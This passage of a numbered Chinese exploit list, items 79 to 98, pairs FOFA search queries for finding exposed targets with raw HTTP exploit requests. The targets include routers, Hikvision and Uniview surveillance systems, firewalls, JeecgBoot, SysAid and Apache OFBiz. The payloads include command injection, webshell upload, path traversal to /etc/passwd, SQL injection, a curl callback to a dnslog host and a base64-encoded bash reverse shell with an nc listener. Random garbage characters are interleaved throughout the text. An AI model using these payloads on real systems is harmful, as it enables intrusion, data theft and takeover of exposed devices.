+ ?) T- H% R( Y8 E7 T
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.13 W. x0 q, I0 M
Host: x.x.x.x, u( U4 N4 Q# ?# ^
: }/ ~7 |, [0 T1 _
4 x1 l8 E5 l1 Z0 o) a/ D: h79. BYTEVALUE 百为流控路由器远程命令执行$ C; u j8 x) R# h% I
FOFA:BYTEVALUE 智能流控路由器
1 j: D, ?% J6 _* k( H# |6 b1 Q& HGET /goform/webRead/open/?path=|id HTTP/1.18 K3 c. C* w; B- N. `7 Z+ L' n: v
Host:IP3 W/ I, t4 P+ P" @/ m0 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
4 `0 ?7 m: M# d7 z3 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. }4 v- ~) j8 H7 q6 ^& s2 \4 R8 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ b6 C Q+ R! |: C) d
Accept-Encoding: gzip, deflate
1 D( j) U0 w$ x# R+ j [8 XConnection: close A7 I1 Q! r6 m5 b/ r o, h
Upgrade-Insecure-Requests: 1- P# [( R+ V4 B# H) R- N! [
% S3 @" {5 a+ R3 n0 t$ n
3 C* t& R( b- f4 R) n6 G5 @' U: h80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传8 w9 X- _* {9 p- |8 k7 g, _4 @; X1 I
FOFA:app="速达软件-公司产品"
% L& o; t; H: yPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
: K) L ]$ x. @; [9 H3 lHost: x.x.x.x
- d5 ?' T# F0 p& L# O* `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% u j" q. c n1 Z& H7 J* gContent-Length: 27
3 h7 c p; A9 [- M1 {% ^; [3 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
7 P( u9 A6 g% G' E' l( FAccept-Encoding: gzip, deflate" R6 @+ V( O) @* s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 I1 s6 c% v }. W! y, y
Connection: close0 n6 {6 C) {, m+ C3 I
Content-Type: application/octet-stream& P4 b- m' p9 J, C1 a
Upgrade-Insecure-Requests: 16 D/ V4 _" Q; }5 P
' `+ g y2 ^1 R- [. f
<% out.print("oessqeonylzaf");%>
7 B: j( q9 @: L7 b! F2 \% n$ i3 a! R) N2 {1 P/ f: J9 S
2 R B5 T7 i3 R
GET /xykqmfxpoas.jsp HTTP/1.1
$ q; w1 N1 x8 l- f9 u) F6 VHost: x.x.x.x
- t, O8 T% J8 u- \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& x+ ]8 |# V) O. Y' q
Connection: close0 M; a" G' `: i" ?
Accept-Encoding: gzip* B+ _5 O6 |, V! ~0 k" l! m& h; T) t
, T- w5 [/ B" ]7 W! N/ U& F, z
4 H- j, q- F5 _81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露( D9 @2 M4 C! n) Q" L8 C! x& p
FOFA:app="uniview-视频监控"
9 t& t L X& |. FGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
3 c- J& N% l0 B* s, Q( j* OHost: x.x.x.x4 E {/ `7 K& |) v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ X/ x! g& M: r. a0 @) F
Connection: close% ~ j# o0 H: R3 D( w% O% L- |
Accept-Encoding: gzip
$ @1 b: ^0 r, \, e) W$ _
" S* r6 Z/ {- K) l* X: R6 G# \8 r' c6 J+ s$ c" D) [
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
' C8 p# s7 u" L5 m! u) PFOFA:app="思福迪-LOGBASE"
1 R+ T v& Q+ p ~& xPOST /bhost/test_qrcode_b HTTP/1.1
! { q# l, m* x- kHost: BaseURL- `8 b: l- N' q
User-Agent: Go-http-client/1.1+ y) _4 N4 G* k: K, ]& f$ A1 m
Content-Length: 23: \' P5 x$ W/ P9 v. J0 J* X$ o
Accept-Encoding: gzip9 o- z0 L7 F9 ?' `( R
Connection: close
. w( ?+ g- @8 ]3 m$ \2 l1 T9 _: GContent-Type: application/x-www-form-urlencoded
* J4 U. e( \ i, _$ U! }Referer: BaseURL
) w( K8 M) f$ y* @+ M/ I. k8 j, F7 W" w( C& a
z1=1&z2="|id;"&z3=bhost7 r: D* |" O# ^
# Y' I7 p7 F" Z
& t% e6 Y) u! D4 N! {$ f
83. JeecgBoot testConnection 远程命令执行
+ S$ G- X; s# z) c9 f7 SFOFA:title=="JeecgBoot 企业级低代码平台"' L; ]7 I9 q$ @- r
z& c0 B+ y0 Q1 c2 W" ~" h% l1 J0 i6 c: v) C/ I
POST /jmreport/testConnection HTTP/1.1' p2 F5 D) A# }; n
Host: x.x.x.x3 O* _3 I. c3 Z2 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 o6 n1 t1 g& q$ wConnection: close7 U; N: N4 t( U
Content-Length: 8881
+ l1 s0 M8 N- Q! v3 R7 a: RAccept-Encoding: gzip
9 V) c6 j9 e* K, mCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
8 b" w5 M! a+ H7 zContent-Type: application/json) B7 @7 y9 N* I5 h& w ]7 Y
: p& U; X1 Q" O) O8 A
PAYLOAD
7 |* j0 m2 R# M
" z& w; N9 y3 q9 E* O: a84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
) T+ }& m( ?$ r s- |FOFA:title=="JeecgBoot 企业级低代码平台"
$ U. [6 }5 p5 d" w
5 T( c7 b) U+ M- t2 [& U6 t6 O# O0 \& w, q
9 \. g5 ~+ ]1 O
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.15 R1 }0 V. x8 b+ A- L
Host: 192.168.40.130:8080
2 u8 J; s* U8 r' @+ G* k8 R* B& h3 m6 {User-Agent: curl/7.88.1' @/ `0 |9 ^, L4 e
Content-Length: 156
' Z6 K9 D# H c* O2 d; A! D: B5 ^' YAccept: */*( N' U( S) {8 w- |# X$ o
Connection: close$ p" n8 W5 `# f
Content-Type: application/json5 ?' Q" V2 ~3 F2 `- c0 ~! D
Accept-Encoding: gzip
9 P# q6 L y/ x, ~0 O' d! j7 m. Y- |
{. T# r6 o/ a# u1 K# D F8 n0 u4 C
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
& v8 q5 Y4 g: X) d; S- c "type": "0"
; k0 N, V0 v% Z6 p3 F}% Y0 ?' B5 E* P/ O/ h1 ^
/ U" ^+ H. j) v( R0 f) s, j% n6 I* g- `# A$ a+ `& T' p" y3 H
85. SysAid On-premise< 23.3.36远程代码执行
# Q5 g" n+ g" g; ?" RCVE-2023-472464 D& C2 F! F" B1 S1 @! I
FOFA:body="sysaid-logo-dark-green.png"
' i6 A) u7 H( z! }: vEXP数据包如下,注入哥斯拉马5 b/ ~- N5 ~; i+ M+ [! y
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1% k2 t, Z! z) w
Host: x.x.x.x
1 G1 A4 @4 p% S; K6 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 { ^) `; ?* I8 @; | rContent-Type: application/octet-stream" n/ `4 E4 E3 I- u) e, }8 B
Accept-Encoding: gzip
1 Z/ p9 q% n7 L6 ^; X; c
8 d# z. \$ f# K' H1 RPAYLOAD
% f8 R$ k) [% P+ B- I$ X
* x3 Q2 O& P. {( K: v" Q" Y O }回显URL:http://x.x.x.x/userfiles/index.jsp6 O+ m, N- i) z' F( B" E- _, x
0 }2 W: U& b' @5 w86. 日本tosei自助洗衣机RCE) L& x. @9 X4 ~) x
FOFA:body="tosei_login_check.php"
* i6 Z" ~! J" wPOST /cgi-bin/network_test.php HTTP/1.1
: v& Y8 C* V+ T" ]5 E( x9 VHost: x.x.x.x) g2 x, J& P$ H+ Z# O7 P' y( N
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
6 e& W' C. h) w) C/ L/ jConnection: close
. f3 {/ L1 Z1 N2 w: O7 ?! ]Content-Length: 441 M! ~7 J3 _- F7 p
Accept: */*
6 g; }3 ?1 H# f' d4 x9 D% XAccept-Encoding: gzip2 M, _, ]2 K6 I: ^- n6 ]9 @1 G
Accept-Language: en
/ L& O; Q( q- b& {( oContent-Type: application/x-www-form-urlencoded
9 a7 t* f- N" ?. |& U) G( U# ?; g( ]9 X9 I: U
host=%0acat${IFS}/etc/passwd%0a&command=ping) b8 l' Q# y+ l0 P, E
0 p: ]7 Z- N3 v6 K6 @; I4 g
- ?; |( s5 W8 J, [' W87. 安恒明御安全网关aaa_local_web_preview文件上传
9 \6 W$ }8 f8 L7 ]0 gFOFA:title="明御安全网关"" j% O: s! i1 T) U
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
& W+ j- i' _" H" K$ PHost: X.X.X.X
0 T6 r/ E2 f9 O/ j4 n! x0 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 ~ i( p8 s7 P
Connection: close0 u. M( s* m) i2 S3 W( Z, B
Content-Length: 1982 U9 O- s7 A! H: ]* n- d
Accept-Encoding: gzip
4 J" e! }' @3 T8 z6 |0 R: mContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
+ r8 }2 E( u- a* M' [: k
2 A9 r+ r) ~9 D% J6 \8 J) k, i--qqobiandqgawlxodfiisporjwravxtvd
7 L. x' A" r' j+ A. o% S; lContent-Disposition: form-data; name="123"; filename="9B9Ccd.php": L% H/ L4 D1 A& A5 z) i
Content-Type: text/plain
1 l# y7 P' b z& d6 r. _/ u7 B! |4 {' Q# h) P7 T% X0 e2 V
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
) A; a3 A P+ R& j' E' o--qqobiandqgawlxodfiisporjwravxtvd--
% i! b) t9 { q- `
' h2 Q& H) A! y
- \3 b8 Z* S/ b8 _2 c$ z2 _/jfhatuwe.php% v/ S. G) o& U, K) m0 i
" }( {, C* o" }" {) Z% f- [- q
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
' y/ k; @% `% X- Z. G" {FOFA:title="明御安全网关"$ c6 R8 k- T* J2 Z1 r. _
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
& r% z3 O4 B6 Q5 c4 FHost: x.x.x.xx.x.x.x5 f8 W8 u+ q) s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( B. V( o6 ?6 W8 {9 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
k) _1 Y4 N( ^ gAccept-Encoding: gzip, deflate, s7 J/ a: V x0 X- ~# L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) g) n7 X6 ], b# n1 C
Connection: close
' A! A* Q/ k& p( C) W1 V; j% ~, J4 h! o1 S. G3 t1 T- [8 l
0 W/ t- ]+ r" H. ?4 e. k* Q7 G: q/astdfkhl.php
+ G3 X# o" T' r& Z
/ W4 n# ]0 b9 F. I' u; C4 y2 y- |89. 致远互联FE协作办公平台editflow_manager存在sql注入
9 t9 D2 y1 F0 @3 I, rFOFA:title="FE协作办公平台" || body="li_plugins_download"
4 E# ^0 j( c4 r4 UPOST /sysform/003/editflow_manager.js%70 HTTP/1.1" i4 a H$ ?; n
Host: x.x.x.x6 n' s8 N z/ Z/ S- v! h6 n4 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ O$ u8 d) I8 U3 m% N( D* E
Connection: close
1 T- N; O. Z6 y [" ^, t( i) M9 GContent-Length: 412 O. y/ `- q5 ~$ V/ k9 S* ~0 A
Content-Type: application/x-www-form-urlencoded0 j! p) B' x$ w. D5 V
Accept-Encoding: gzip
$ p" _" ~6 x6 X& _' Q9 a
( |* h0 x/ Y9 T- Ooption=2&GUID=-1'+union+select+111*222--+
! k! ~8 n' ?6 x% |6 x' o0 i, j! C# ]/ B8 u
: X) N. X8 a4 ?4 y) {$ q/ ^: ~' O90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
/ U* a* |4 n3 ^FOFA:icon_hash="-1830859634"
+ X# S/ f, G) E! ~POST /php/ping.php HTTP/1.1
6 d @: s5 v3 k- y, j+ j) HHost: x.x.x.x0 o8 N) Q8 e2 j l+ R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0( p1 k) j8 D& A1 L/ |: D& `7 g7 K0 b
Content-Length: 51) D. Y% N3 C6 ^9 V! F; y6 z1 n
Accept: application/json, text/javascript, */*; q=0.01, I) e; I x9 p/ i# ]" Z4 j1 ^
Accept-Encoding: gzip, deflate2 \( b4 J0 q: B$ b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 {$ ]9 Q: Q2 O3 Z! t7 X2 Q; n7 HConnection: close- E6 y/ g# D- [. a! k' s A9 G5 r
Content-Type: application/x-www-form-urlencoded& N# d5 \1 b& B9 D
X-Requested-With: XMLHttpRequest1 W1 {/ k7 }( n0 W- |# l" g
5 u6 J+ |8 p w9 z' `
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig; J y) A0 k0 w8 C
: w$ ]- T# D9 z9 k6 O0 Z( t/ y3 H$ S' H) n) A" V% Z0 o
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
- _3 p1 ?# d+ [% l3 xFOFA:title="综合安防管理平台"- G, V9 \, ^+ q9 b: ~
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1. _1 m% h% v+ ?- T
Host: your-ip3 H# h6 Y* t2 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36- Q6 h+ c7 K F4 Y* A; l* ~9 b3 P
Accept-Encoding: gzip, deflate
* M8 \" r: X6 B' k$ ^0 g/ n1 ZAccept: */*5 f/ o& ]6 C# o/ @) q% i
Connection: keep-alive& y6 s: S$ w& t. L
; z' t6 F% n2 S6 Y; D
* M1 t; p, Y ~$ E' z$ e$ x8 b4 J- l* ~2 K0 w% ~4 y
92. 海康威视运行管理中心session命令执行9 L# K/ } H9 Q: S I" P' o8 |
Fastjson命令执行
4 u' q5 @% P( S" k- a% q1 Z+ n. Mhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
! x! t8 i) e, Q. r* ?1 @7 [2 S/ JPOST /center/api/session HTTP/1.1
: } |7 Z: h3 D# UHost:
/ P: b, r5 ]2 |9 }Accept: application/json, text/plain, */*0 n% R) l0 K3 w3 F1 z0 ?2 Q' r2 \
Accept-Encoding: gzip, deflate- r3 q b$ p8 U0 Q0 p
X-Requested-With: XMLHttpRequest
9 @) }2 k% z8 N! _8 p* M/ ~7 f& DContent-Type: application/json;charset=UTF-8. V. E2 [3 { U: s) ~2 \* {! ^2 x$ _
X-Language-Type: zh_CN
! J: i3 T C% [8 `3 u/ V+ K8 WTestcmd: echo test
1 k3 ?6 K2 s* W' T- \7 a5 B/ R6 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36/ Q6 u0 }) O& S9 H- {
Accept-Language: zh-CN,zh;q=0.9
1 P8 R, D: w0 |4 e3 g; _- }! XContent-Length: 5778, P6 q% n1 `- \* `% h) u
, H3 h( m2 L: y4 L/ b1 ]PAYLOAD. }1 P ^: D4 j9 j, q
! @- {" e( C3 j, n; R8 @0 h' x
2 z! e. y% h( q3 T+ y2 U5 A93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传. `/ C1 Y A& z$ j( {5 Z8 u
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
! c+ w# }, T0 T3 b" \POST /?g=app_av_import_save HTTP/1.1
3 N2 Q# ?1 s! c- Q- P/ S" fHost: x.x.x.x
% E6 p+ c! o* RContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
* }. ~5 H y. O: y' S" M+ NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ Q, S$ z2 u& {+ c/ D8 N5 m6 {
. s8 D- G2 ?- Z6 @% S------WebKitFormBoundarykcbkgdfx
9 S" l; ~8 W$ P5 w @5 l, [% `9 rContent-Disposition: form-data; name="MAX_FILE_SIZE"
& N0 E0 [# S8 Y8 ^: l! ]9 j
4 o3 ~9 a4 C$ ^6 U6 {5 k10000000$ ]7 w7 Z; G- ~$ v8 {' m
------WebKitFormBoundarykcbkgdfx
$ r% _3 ?/ t% D+ oContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
: ~9 E# E9 S/ C, v1 E4 `" GContent-Type: text/plain' j c6 B; `9 s, d7 G5 k- |
+ B* X9 B7 R# d* Wwagletqrkwrddkthtulxsqrphulnknxa% o7 o$ I% k9 n
------WebKitFormBoundarykcbkgdfx0 ]9 o+ \/ R ~2 A& T/ J C' W/ n+ L
Content-Disposition: form-data; name="submit_post"
4 F. H* Q, |3 S2 M: y, |" T6 b' W. h. K9 i7 _7 r# Q+ w
obj_app_upfile Z p( i; M0 N L
------WebKitFormBoundarykcbkgdfx; g5 Q7 S# K+ {2 D6 A
Content-Disposition: form-data; name="__hash__"9 A4 f4 l8 q! c# l' f6 i5 w
; X$ k! x& y: ]/ a6 R" a
0b9d6b1ab7479ab69d9f71b05e0e94458 C' o% L# ?- e" K
------WebKitFormBoundarykcbkgdfx--2 s( B" A# X# |& i( d
1 j9 T* h* q% v! [ O0 c
: i; k! n0 ^ Y c: I; ?! jGET /attachements/xlskxknxa.txt HTTP/1.1
0 F; p3 s4 ^6 _7 l _, V* H8 `; jHost: xx.xx.xx.xx
e! X, `: F4 g$ AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! C+ z7 b0 q! @" U, m% m
' x# V) F" l) d9 t3 b8 O2 [" t/ L& L7 L. D
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
- l( w8 c( a9 ~ |$ L) \9 ?FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
G: C6 S& i( q! LPOST /?g=obj_area_import_save HTTP/1.1
- `1 _& T6 q: |" y# }4 P- a/ YHost: x.x.x.x
2 b+ j* `# |& Y- g4 P5 `2 [' LContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
+ j; A; T$ \; b) ?' fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& _ I/ ]9 U% S+ n
( a$ f: e( ?5 C, H, g I4 r% m------WebKitFormBoundarybqvzqvmt# a; W- Y( }7 h! ?9 X4 K
Content-Disposition: form-data; name="MAX_FILE_SIZE"4 s) K, y3 z1 h6 p5 U9 l8 P
$ x& C) L# \' e$ h* ^100000007 P& X- A$ h5 G6 H/ {# v& S+ t
------WebKitFormBoundarybqvzqvmt
0 M0 j2 k% v/ d; f( TContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
/ f( F0 h2 a: m0 ^* G" lContent-Type: text/plain( m2 Y2 m/ {" z* i4 z
6 ^ J+ D6 Q3 U9 m+ \" |6 U6 A
pxplitttsrjnyoafavcajwkvhxindhmu c/ b! h' m' h, ]9 J, n- W
------WebKitFormBoundarybqvzqvmt
$ K3 w7 C4 v: f' x6 f' g3 Z( RContent-Disposition: form-data; name="submit_post"; i1 F/ m' G4 w$ t' H+ \# K
, v a5 F( M: f. R8 bobj_app_upfile
( } x5 x% ^8 S+ z# [: w% n$ y------WebKitFormBoundarybqvzqvmt
4 |8 Y b9 H( Z3 q% `" y! h D' O" gContent-Disposition: form-data; name="__hash__"
4 C& z* a6 A, w: M* U5 t9 i/ W- w% z _; M
0b9d6b1ab7479ab69d9f71b05e0e9445
; [& X3 L) y9 U5 f# N+ a------WebKitFormBoundarybqvzqvmt--
+ Z" q. n0 O4 K
$ d9 X: L6 b/ E5 U; V/ H ~$ K6 n. X9 P) X
; d8 t, n# Y, R' w7 v/ k' g/ ]4 q7 Z. WGET /attachements/xlskxknxa.txt HTTP/1.18 U% f) ^1 R1 j+ i
Host: xx.xx.xx.xx
1 Z, A3 Q6 [5 u5 mUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, B! |/ _2 i) g. J5 Q7 U
2 [2 g2 u& y$ R6 N) `: O
6 h! P& F8 y3 ?
9 m- \' s" c. i- ?7 [7 M0 m+ Z95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行: l8 C+ J) ~6 G+ {$ u
CVE-2023-490702 \6 K( X( X% S1 K2 V
FOFA:app="Apache_OFBiz"
6 V& `( ~4 x+ W% I9 uPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.17 Y) o; ]5 Q5 C/ ]7 r8 F% F6 x0 p
Host: x.x.x.x! A& N. {& F; B! C8 O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
1 e" a7 t2 d9 i6 HConnection: close
- v) @8 \+ W2 v7 l5 E# I9 N" o7 [Content-Length: 889
( c2 t3 S9 \% N; l9 f x* o# E( v$ HContent-Type: application/xml
+ m# |5 g# e! f/ r2 ^Accept-Encoding: gzip
* N0 G' I' f6 f/ w }8 J/ |
: E. J" G+ j2 g% r+ f<?xml version="1.0"?>' f7 L& V# ^! X
<methodCall>
. k! W7 u2 l; H3 ^$ _ <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
% B, Z0 U7 R' D/ |; Y/ ~0 | <params># |- J; p& C3 b( Q6 d
<param>
0 Y. {# ?% @0 W# Y: j/ v! x$ \ z <value>6 T* z9 e+ I' G4 z/ Y8 O
<struct>2 S" H+ [6 e8 S) _% m( p$ m
<member>
7 k4 w/ `2 j" r, ?8 |1 k <name>test</name>& a8 P9 P% n1 |
<value>
8 k0 P# L/ b7 S$ `$ n3 ` <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>( O% g% ]6 \# g7 R
</value>
/ \5 M+ o/ | g. L( g </member>
: b4 W, m6 a# a$ O8 k </struct>
$ v. c1 Y! J1 |3 F4 K </value>/ n( T" p: @! S5 s1 N$ G
</param>, w$ i9 U& T4 g9 Z+ A
</params>* p y8 [% ]! H* E
</methodCall>5 ^( V1 ]6 W1 a' P0 G5 y% P% E
, U: _ l0 O ~9 Z2 q2 T' o
: b; \% c3 R7 W" }. D用ysoserial生成payload
9 t9 x' ?3 R' D" v- e# Ujava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"( T; d4 F& l4 G2 f
4 @+ @ z2 L' G: g
6 @$ T3 c; Z8 q |* T2 L! p# a将生成的payload替换到上面的POC" X A0 F5 K0 a) R$ Q9 p
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1/ A- L5 o8 e3 p+ K J
Host: 192.168.40.130:8443/ a4 D. k5 D( A. z2 J) ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36% [! t0 D; z9 J4 [
Connection: close
: w7 j1 Y$ y, o. G' ~- ^Content-Length: 889
4 x9 r" V0 ` p, o4 t8 @% g3 h* kContent-Type: application/xml
5 n! V! l: ? h6 c9 Q/ bAccept-Encoding: gzip7 E9 K; Y! ^. I% C& p T: l
/ I, @) G% t E2 k0 b) m: E8 m |9 FPAYLOAD6 E4 g6 n, N; p, f- V
. R q. i' \; z6 j- ]+ |
96. Apache OFBiz 18.12.11 groovy 远程代码执行
3 a- T0 }) r- S- r: KFOFA:app="Apache_OFBiz"
8 f0 K% S" x8 z- |1 B7 ?, `POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
( a8 m. y; o$ k; f& rHost: localhost:8443. w) C9 S. \: ]! C2 y! x$ ^+ W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) w/ }0 ~+ N5 v* ZAccept: */*
1 o9 {4 B& R: B- {9 E0 ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 N; Z Y8 r M- m5 p+ I
Content-Type: application/x-www-form-urlencoded
& t% E9 l( X3 D: B$ T5 [Content-Length: 55
" z! y% ^/ n5 @8 [
1 x7 Y# A4 `) N# J) y0 i: x* SgroovyProgram=throw+new+Exception('id'.execute().text);
3 W: r& N" O6 m& _$ r% [9 H
5 d8 K- K8 Y' e% B* X. j1 Z* p, m- R3 x1 h: H! h! Y
反弹shell. v1 x3 [, t, ^5 g2 l8 x2 O+ B
在kali上启动一个监听8 ~5 ?- D3 ?) L2 g- [0 V! g' ]
nc -lvp 77773 g7 {8 d( i$ y: H
7 T F( |' H! m/ v# m/ j* `
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
: K* k: l% N" f c. _2 K2 n; ?Host: 192.168.40.130:8443
8 h) q0 h2 s0 y6 t. x4 `) {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0. H- @; J1 z5 l
Accept: */*
% o3 d) q4 }8 J0 ? _( P3 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 A: S2 L3 y( d Q5 c* hContent-Type: application/x-www-form-urlencoded* o' P0 _! V% A) t8 ?" L
Content-Length: 71 W9 o! @# K$ N" u4 T
$ m# W" }. c" }
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();. {) h9 |5 O: H) z: S1 ?: L
# `# }- d3 j l4 y, G8 O97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行1 {& g- V' G) Y) ~. ?* B* J4 |/ x
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
" V5 u" K0 ~ b$ UGET /passport/login/ HTTP/1.1
0 _, B5 K" l; h% ^% JHost: 192.168.40.130:8085, L- ^7 K$ T' `" A9 D0 l# B( S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* Z( o2 n: D, a! V( ~1 u
Accept-Encoding: gzip
0 P$ Y% h* s* ?, pConnection: close% N+ W$ O" c* t
Cookie: rememberMe=PAYLOAD9 x. l5 f4 Z$ O; s! v
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
- {: O- l! }% V! t5 A# L+ `. n: |% O' ~: H" l
7 R+ K: @' H9 W; L6 p2 V; S98. SpiderFlow爬虫平台远程命令执行8 i3 Q# _* I3 D
CVE-2024-0195
0 ^% T6 D* h$ ]# G8 l- C9 {FOFA:app="SpiderFlow") o z, J- T* ~- h2 |8 I3 u! A& E
POST /function/save HTTP/1.1# O" m) u4 m+ B% y- G. C5 @' B4 o; D
Host: 192.168.40.130:8088
6 o. ]( t: [5 d+ P3 K$ V. xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; u1 t/ d N& V/ v) d7 I
Connection: close. e- l; A0 v* O" D/ N
Content-Length: 121
" c- m1 q& t5 A0 {Accept: */*
